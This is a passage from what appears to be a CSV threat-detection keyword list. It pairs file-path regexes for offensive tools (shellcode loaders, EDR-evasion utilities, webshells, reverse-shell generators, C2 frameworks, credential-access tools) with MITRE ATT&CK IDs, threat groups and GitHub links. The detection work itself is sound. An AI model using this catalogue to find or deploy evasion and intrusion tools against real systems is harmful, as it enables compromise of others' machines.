APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","401","48","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*/shellcode_samples/*",".{0,1000}\/shellcode_samples\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/shellcode_sources/*",".{0,1000}\/shellcode_sources\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/ShellcodeFluctuation*",".{0,1000}\/ShellcodeFluctuation.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*/Shellcode-Hide.git*",".{0,1000}\/Shellcode\-Hide\.git.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/SHELLCODELOADER*",".{0,1000}\/SHELLCODELOADER.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/Shellcode-Loader.git*",".{0,1000}\/Shellcode\-Loader\.git.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","179","37","2024-04-08T20:20:59Z","2021-08-08T08:53:03Z" "*/shellcodes/utils.py*",".{0,1000}\/shellcodes\/utils\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/shellcodetester*",".{0,1000}\/shellcodetester.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*/shellcode-xor.py*",".{0,1000}\/shellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*/ShellGhost.git*",".{0,1000}\/ShellGhost\.git.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*/shellinject*",".{0,1000}\/shellinject.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/ShellPop*",".{0,1000}\/ShellPop.{0,1000}","offensive_tool_keyword","ShellPop","Shellpop is all about popping shells. With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.","T1059 - T1574 - T1055 - T1021","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/0x00-0x00/ShellPop","1","0","N/A","N/A","10","1428","235","2019-04-02T14:53:19Z","2018-03-08T03:58:00Z" "*/Shells/shell.aspx*",".{0,1000}\/Shells\/shell\.aspx.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/shell.jsp*",".{0,1000}\/Shells\/shell\.jsp.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/shell.php*",".{0,1000}\/Shells\/shell\.php.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/shell.py*",".{0,1000}\/Shells\/shell\.py.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/shell.sh*",".{0,1000}\/Shells\/shell\.sh.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/tomcat.war*",".{0,1000}\/Shells\/tomcat\.war.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/wordpress.zip*",".{0,1000}\/Shells\/wordpress\.zip.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/ShellServe.git*",".{0,1000}\/ShellServe\.git.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","1","N/A","6","1","N/A","N/A","N/A","N/A" "*/shellshock.py*",".{0,1000}\/shellshock\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/sherlocksecurity/*",".{0,1000}\/sherlocksecurity\/.{0,1000}","offensive_tool_keyword","POC","POC and exploit tools on github","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Shhhavoc.py*",".{0,1000}\/Shhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*/Shhhloader.git*",".{0,1000}\/Shhhloader\.git.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*/Shhmon.exe*",".{0,1000}\/Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Shhmon/*",".{0,1000}\/Shhmon\/.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*/ShimDB.git*",".{0,1000}\/ShimDB\.git.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*/ShimsInstaller.*",".{0,1000}\/ShimsInstaller\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ShInject.exe*",".{0,1000}\/ShInject\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/shocknawe/*",".{0,1000}\/shocknawe\/.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*/shodan-api.nse*",".{0,1000}\/shodan\-api\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Shoggoth.exe*",".{0,1000}\/Shoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*/Shoggoth.git*",".{0,1000}\/Shoggoth\.git.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*/shspawnas/*",".{0,1000}\/shspawnas\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/ShuckNT.git*",".{0,1000}\/ShuckNT\.git.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*/si1ent-le/CVE-2022-0847*",".{0,1000}\/si1ent\-le\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/si1ent-le/CVE-2022-0847","1","1","N/A","N/A","1","0","2","2022-03-08T05:18:15Z","2022-03-08T04:51:02Z" "*/SigFlip.*",".{0,1000}\/SigFlip\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/sigflip.x64.*",".{0,1000}\/sigflip\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/sigflip.x86.*",".{0,1000}\/sigflip\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/SigFlip/*",".{0,1000}\/SigFlip\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/SigLoader.go*",".{0,1000}\/SigLoader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/SigLoader/*",".{0,1000}\/SigLoader\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/SigLoader/*",".{0,1000}\/SigLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/signer-exe.py*",".{0,1000}\/signer\-exe\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SignToolEx.cpp*",".{0,1000}\/SignToolEx\.cpp.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*/SignToolEx.git*",".{0,1000}\/SignToolEx\.git.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*/SignToolEx.sln*",".{0,1000}\/SignToolEx\.sln.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*/SilentClean.exe*",".{0,1000}\/SilentClean\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for 